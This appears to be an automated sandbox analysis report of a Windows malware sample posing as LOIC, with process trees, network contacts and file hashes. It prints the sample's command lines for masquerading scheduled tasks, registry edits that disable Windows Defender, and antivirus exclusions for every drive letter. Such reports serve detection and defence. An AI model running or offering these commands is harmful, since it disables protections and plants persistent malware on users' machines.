| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\LOIC2.exe
"C:\Users\Admin\AppData\Local\Temp\LOIC2.exe"
C:\Users\Admin\AppData\Local\LOlC.exe
"C:\Users\Admin\AppData\Local\LOlC.exe"
C:\Users\Admin\AppData\Local\Runtime Broker.exe
"C:\Users\Admin\AppData\Local\Runtime Broker.exe"
C:\Users\Admin\AppData\Local\LOIC.exe
"C:\Users\Admin\AppData\Local\LOIC.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Windows Defender"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c COPY "C:\Users\Admin\AppData\Local\LOlC.exe" "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\schtasks.exe
SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5F85.tmp.bat""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Users\Admin\AppData\Roaming\COM Surrogate.exe
"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
"C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Windows\SYSTEM32\rundll32.exe
rundll32
Network
| Country | Destination | Domain | Proto |
| DE | 193.161.193.99:21265 | | tcp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| DE | 193.161.193.99:21265 | | tcp |
Files
memory/2028-0-0x00007FFAA4D43000-0x00007FFAA4D44000-memory.dmp
memory/2028-1-0x0000000000C90000-0x000000000114E000-memory.dmp
C:\Users\Admin\AppData\Local\LOlC.exe
| MD5 | e6b7d05c7a4369dd9112959795bb3521 |
| SHA1 | 80c60595def3cbb2d126e3c86c9a1b92572b55b7 |
| SHA256 | 10eb620d956a63295cd933a3bad5769b1f8b0eec8b3748569467c82fb61e295c |
| SHA512 | baa982104c839f9f0893dc2940b418fc64fcc9e964a2791c176f7e7795ee7732429287d84f5d37bea15882a6462eaa7f7996bf283a27a0718ee96054a396a806 |
C:\Users\Admin\AppData\Local\Runtime Broker.exe
| MD5 | 9c3ad681c33d3fb6934102a35cb7a2ad |
| SHA1 | d3630943b6af7b956eb459fc2e8f5137f2f5f8a1 |
| SHA256 | 9625d7f8c8ddded4818a03ec7912c0df6ce464a95eb055b01a15fe3aa373305b |
| SHA512 | ea310b840455b8279c72ccb8e45f27b6ec861baf66d223b584d790bdca6426b54729eb7c80163c8e6ce1e88044088c1167109be0cb9418935d70ef42a6bbd466 |
memory/1428-16-0x00000000000E0000-0x00000000000F6000-memory.dmp
C:\Users\Admin\AppData\Local\LOIC.exe
| MD5 | e6fa3028cd03318496852718143d256f |
| SHA1 | 4c85973d612cd1955163c244c9c334d3a0c507cb |
| SHA256 | f60a52512773b52def9ba9ce8aad61144d2cf351f6bc04d1c5a13abef8f3b89b |
| SHA512 | 29089eccd1e670570fecafdd682f0ec13bc55fb17cdc0938ff4c6fd32c55c1919e26fad5b3ffed78217a94a9e8aba768cdf092ffc85f6ab19fbede0dc0fae0bb |
memory/5088-18-0x0000000000D40000-0x0000000000D68000-memory.dmp
memory/1428-19-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
memory/5088-20-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
memory/2492-28-0x000001F8A1520000-0x000001F8A1542000-memory.dmp
memory/2492-31-0x000001F8A17E0000-0x000001F8A1856000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t1sdungg.n1x.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1428-70-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp5F85.tmp.bat
| MD5 | c80a2e321f698e3ccd43038f7739e527 |
| SHA1 | 8a00eaf5485819a5c857ac70f03aa1881c9b09b2 |
| SHA256 | af4d2adb9ddbe125d769c3623ad96e8102cbd1a1dce6315bd818fc0219670681 |
| SHA512 | 197b38ab1b2b225a0067aad6f8297c8a5e84f988e319efca8717843fc293950211737663705b8555cd1e0951843588bc298aad517d9e37f4e9bc08efacc51286 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 65a15f6c9464167c6e8ac1ab275e8f2a |
| SHA1 | 50d77247b262e76f0ad3551d7c29d2464b11a082 |
| SHA256 | 2e469156f4329c3ffab494824102dd2f715e4753f62cfcb69db154394d88eb58 |
| SHA512 | d5290b8506e8d29f952e119a3f1c77d02b94996803a9f238ebc39e686312e1f7fb8b70443a9f12c5aaf7acfb15532b8c585493534a61c22f6579a5ebddc8ae69 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dee7d12c801b443129920af11520a8c5 |
| SHA1 | 566261c78314a3b566d2c48da9efae665c6e6390 |
| SHA256 | 7f3650e98831efe77880d47f812c3a3bb253446dae9f128ba4c15eb34e2f7adc |
| SHA512 | d86a353adec2fdc79b14cd8e63e97b9aa0a6601c99d1463a51a27a11519c9c30f48cb0af4f9cc9df49c82814526cda98a59864c9e60480547409ad46f6cff9e7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f0d86221dc5c289f819c27a18fa0a21e |
| SHA1 | 85a9e0179224022e74ced3070cd5a3faf00b6c54 |
| SHA256 | 8b48313c7e700ebbb702699d262f76d747f8837daca371f0ecc2369992d170bb |
| SHA512 | 3a9a762ba4c0c70fe7944c0686b870812e9cda9d21a99e4f2324358006f21652f570bc67c54d2ad1d70a2e1526a4d8ac94d20d40ec3833ada1937607b5860b81 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5791cc0f96aee1e61a467cc5f742d2db |
| SHA1 | 4591b5b8e7f92dfa5c80cbac92db93f19493012c |
| SHA256 | 30c23ff3cce5089d3167da344f7d0e261aef813d792cda80c035133914acc89e |
| SHA512 | 3d8b3b6ba4d4d0b6e5705b7bd9d8bc0fcfa45e1289cde16edcb993cfe303d04812d14fa2203e022c166df8a1cde3193c26cc850c0c2c3b66a722f402308d1fb6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6af8244e1606a227be0fdaae43220519 |
| SHA1 | 9fcaf8c61bc447c7a59c403dd9564991f6b00893 |
| SHA256 | 3adf1891e6d8f993d7c105d45e949ffec881595a35dc4a783903ebc64dd79e1c |
| SHA512 | 1ebeb3392252fb863a77807283fd3dc0f4da567a76606e83993f3930894d6c6c89a159ee779f3d7182f926a2e4053ebea1bbf25161d9e50a06c2466a00e06071 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 784767eea6fe6909f2812561991cf31e |
| SHA1 | be412d54a8fb7024d6991f52f4f0d4af7c988544 |
| SHA256 | f8b432e9cba50e369879498d4ce6551fb057ed0bc15b4bf9fb07fad0f0f57ce0 |
| SHA512 | a2b8e80031bc69620ee084f647a99f220e3e8d02a39f2ed52fdae6274f0d5aa70fda2e6f0a475dd971e3a09b5cefdd84de8de62ea7cb019510c30cc8df3b60ab |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0ebfd165e37055d39447ec792a24cda1 |
| SHA1 | e76d70edf05aa0ab3c1cfca0b489d5ee5c16e981 |
| SHA256 | 1e2b1de59d2d3358d179cc1b80a615c29ce8ad12ceba5ccf74a6e0ab59807625 |
| SHA512 | 9b469ee9f9c30a92a46a1df0755cb13b275fd7dd05405d07e4a9b348bdb42fcb36bfaeda3781b612e61feacfc59bf8f8944a4193c40815c6b0b79289c47717a5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 54a5ac41cb04add283ef259fe504095c |
| SHA1 | 97b5ee9de90628a804333eef4dfe362663686c0f |
| SHA256 | 4fd0c23c7b985f961eca7ef0d6f051bfc870a99c573e6caf50a08de6b428855c |
| SHA512 | c31a14ba9d0a1d32c689f901b0874aa7d67d3fb5ee6065160c3c0b90bd4815d1ee1761a43905f658feb63156728c77095724f068ab23fc6c8e9d4d2ec23fb4ba |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9d2531a3933e3006aa7711d827ec81e4 |
| SHA1 | 2d3a06b582537f34a5e93c16ff17cfb31e5eaf37 |
| SHA256 | 42f512fd7ed938c2e92ab4e55d6a1eaa77f615b8070fd247dc7435bbb0353fa6 |
| SHA512 | 55a0dd4a7423bd2a26d92e596493fa6086f9a224a0a8df71c5e79afc424fc32537fc3a65cf3b2b5383a290824ee295ee8d7eb4396340c7dc53fe1a1b040cab92 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dff6b8515fef00616c9e7d31ebdafca3 |
| SHA1 | fe92d7d821097f69f24eecf1a9606cc9369af9e2 |
| SHA256 | d19a6f55cf3e5717f603c18d85a77b4175e01c4014dc76f5335b3a386eee238a |
| SHA512 | 6464b6e6d4e630c66dc70f78e66a3896da08fc9a4adfb9a4aef4a9eab1396951bdf55495033289cca6871cd3d8582d98087ab5ac3e67aaae712cf308e6f39dda |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5ef2a2123a04cc34bf01b9ea3b8fa915 |
| SHA1 | 1128591d05c38a9785a40da7be2205f7a083cfe5 |
| SHA256 | 2314498ba37a5c5339e896ba7a4f31d5de6af1004c3949561c5e471c8283a6be |
| SHA512 | f7fcad9baa765f04f7f9d89c6a43cfee2f1ed5b4ff0bb2d0f66a38e18c396238a4dae51e65abf9e38ecd07c87a8ea979733f131f6e99ebd434f449a9061e51e0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3be63e99ccf19a621fca5ec2606e7660 |
| SHA1 | fb973ddf6c9fdd73fc00eaf1a332c68f234af75b |
| SHA256 | 9ff307c4b9a5546bd8f6a39ce9bae8050ec57e4dfeee4c16cdf3b8ffaf8f1aae |
| SHA512 | 6a02b4517040efbc61be5cf73eb7aee68db88d3649a58b3bc075466e49cabf8678aaa1ef7b9f2004831011ad0e26658869827737c50a9076627d237c8168a217 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 516627eb5b159acc4999adff5fe90c04 |
| SHA1 | c8f79ae465d3232409194c0b241de5f010025449 |
| SHA256 | ac7b75a17d926bcaee3e2a47f6c74d4fdcfa41e449eea01760f7ee6a28b8d034 |
| SHA512 | 1832d4548ac6f1ffe32663ff3158b2fa0319067fe71a5fb92af72db5e6fe15b66c91178662dce01721c8755053c151a6a3819979d7478dbbbfa0657dc0fa3252 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5b5274b69e9e7c4d352fe958473f0cca |
| SHA1 | f437e3f395e059485a6064c5cce8c35fd59fa327 |
| SHA256 | 3604d396630667afdd1aff92596639a96b25c78e27ebb4e89ba6dfcecce83cc1 |
| SHA512 | 51866da6afd4ec9bc891c1289ee28cb91bb51911c513c38dddcdcdfb62dcbfe6ff1e517cf4b22156fb4dd2a2748d53dba6b7c3d61c6b97e21780e2b8515b16e9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8298b06a061d68331ffc15f1fe2116d1 |
| SHA1 | 2fd4dc034a861e0120cb4052cd7c0ed289c6a45b |
| SHA256 | fd584555426e3f4923b2f9f0feb9fe070d5b8d4aa317783f729dfb454323c49a |
| SHA512 | ecc1eb6723056eeb2a073863b8f18c9610d9fd25b65267f1ed819777c1bf0576723225487c35b542831621f5384492c68d32b69c05aac727aca21b31113da498 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 89ca26ce97742db20cc26d8d68143282 |
| SHA1 | 3a95f558ba79d070c2926b295e13f613f1ad46b0 |
| SHA256 | cada41d61bbcd578070396803c052262fa6be6fb1f3791ce2feeda020b3ab67b |
| SHA512 | 6e9fa5fbb0bfae520a0ef110ddfd85a473892c41e5614b85bb5f17c5c7a332d3716a287d18a31ceabbecbd5fa1c63dd6aff1de4e317412538bd24f3dd90ce53b |
memory/684-728-0x00007FF7482C0000-0x00007FF748747000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 199eb8b9fc74ddc05b593eeae99773ea |
| SHA1 | 390f79d9414db1587c02c52453007c2ae81471bc |
| SHA256 | 1f56e75887bb47282e208f5628a575e344063a979be8692fde4a6eeca35b1fda |
| SHA512 | 2c9cbc0aee47a8fcce464c36740789374cc943105428e336bde2b756ae7c765bb5b4728b10f450aa45b503533f8f9a8a4ecd3e6d4901b4fe1a7b27dbb2dc45e4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d293e2ae458c7fd51385af4c083ae05d |
| SHA1 | a8aa949c986e0c50da7f41684cc81ad86d5497d4 |
| SHA256 | 2dd29ea944dbee71fd4458253f841d2ae1122751d684c6bd0ae5adcac6ef8608 |
| SHA512 | 62e886559bdb9d72c23cad145376fc8c0102bd3a6c5756144bfb6c12034a7fa424e4818391465b25f5a4a04dd8780aa19c876348451c1e5b880744f2d19039c9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 283f68751e33f23d16877b377419b903 |
| SHA1 | 0ecf396bc78a058ba272d49756e6194ddaa53436 |
| SHA256 | 846f46809a52c8fa10afae720eff2971a06cac9cf739b9464287a95c1066f2c5 |
| SHA512 | 9eaa91c417c7a096876bedf7287fd8c318f69fb839aa88633dcfe994a3005e35293d23d43eeab395cce80195f3ded43c1e6fe98d14db8ebf3d39d2d37d7b31a5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5d04082b10da21a7e673200cfa9e427e |
| SHA1 | 748a39b12ab49ab4635c971c5be55bc53dd43f2e |
| SHA256 | 303745047527df87ab6399f3bf47bfd0ba820f3d48c79711f0363f2930502397 |
| SHA512 | afbec904e7841be42ac8659ba28e9eaa2dd1d77954cc5c0a982bb40bc2783cf8d24c3c62402b4bb62253e8df25fb1a39d9aa28da7d55068aa6f194e83c42705e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c47eaad0c9f711bc0c5829a6fe920560 |
| SHA1 | dd7de5b35a0bdbcb589f83c46c252286d14bbaa0 |
| SHA256 | 303976a1c6929e50a0d9aa4c7819d615c2afd92957dea6b261fcf498dcacde15 |
| SHA512 | 237631c7286411919536df36484efce65b57109265dee00e50b2c8f085220630149cccd3dd4b18d6f9332313456401a28e72f092d4c079d8efe7ce4df66b1471 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 88470be2473b012e40f7227e251ed3d6 |
| SHA1 | 0ea63466eda2f6681bf45ebd9999bea1d8872077 |
| SHA256 | 90e351afb51e8d116163eb656da69ccfcdf44357d8b092c349502c47b57b9211 |
| SHA512 | e4828ce919eecdf6f3a8db45ae936af5025f9929af6775c846bdb6fee5ff2880ba08726755927f30912bd8eac026f19f319182dc4555a5175acd9b897dfe0b7c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a151a81d411958373cd852433cc1cf1f |
| SHA1 | 66509e344fea100f8abf76ede12ab100a7827c62 |
| SHA256 | 29fe328765b9e17ae6636db46b09a03da07bbcd9ded4a425534701a5d3f1fe84 |
| SHA512 | 5b24373da962bf3129e9d5b4b1a78589c7428466300e9c2935e48f21bee26d777b2e37198eb68d27533e3f214d8ae7bb06258e749c7ccc83f69c7ba501050085 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7a769c8567230c11372c30b81d516841 |
| SHA1 | c4a5596432bfd397306908889bf58b57d9a2dc72 |
| SHA256 | 6853ac5d99b3c0e74daec1b39f58c0c86160ee3d0275f9be2688c8a13d00f2c2 |
| SHA512 | 35104c064f5aaf879090df4910a97f9b9759ae39bcc3688beb7dfc3cbc96f79b23f752f712bb7706715ebd9ec8899139cac5c19480e20421b56cd40b145660b2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c770e1bef4e361f6cd00ca3720dc439e |
| SHA1 | a6563ea8e18d442c287f662bb1adafe269a65ffc |
| SHA256 | 8e345ade3d714201af8912b864c2e0fdc46fa3f38eeb1178f85fcee60e5a04bc |
| SHA512 | 87e74bbcb74cb32d5e067df4d43d5a4d8e943822d8743e3bf653109db23d998a0b4c2707685bbb97003eebe765f8404a6bc67ad21667d105fd6d479f5a01f86c |
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
| MD5 | 1837aea22a774bde2cd2eca02b5995a0 |
| SHA1 | c00b11f612716a5b9f282264538ddc2e041d8981 |
| SHA256 | 3263283f59723e5487b128439d495da10b06f84a84793da717a35e0dd7e3b905 |
| SHA512 | 9f479883cae36152dd2d2bf55e35d2ab05783e214479d12b957d316e4d3c16b63d9dfaf11f3752f9831c182f7c4b06261849042999bac4544fed4011c9fad67b |
memory/4300-1172-0x0000000000F80000-0x0000000000FB4000-memory.dmp
memory/4300-1173-0x0000000002920000-0x000000000293E000-memory.dmp
memory/5088-1174-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
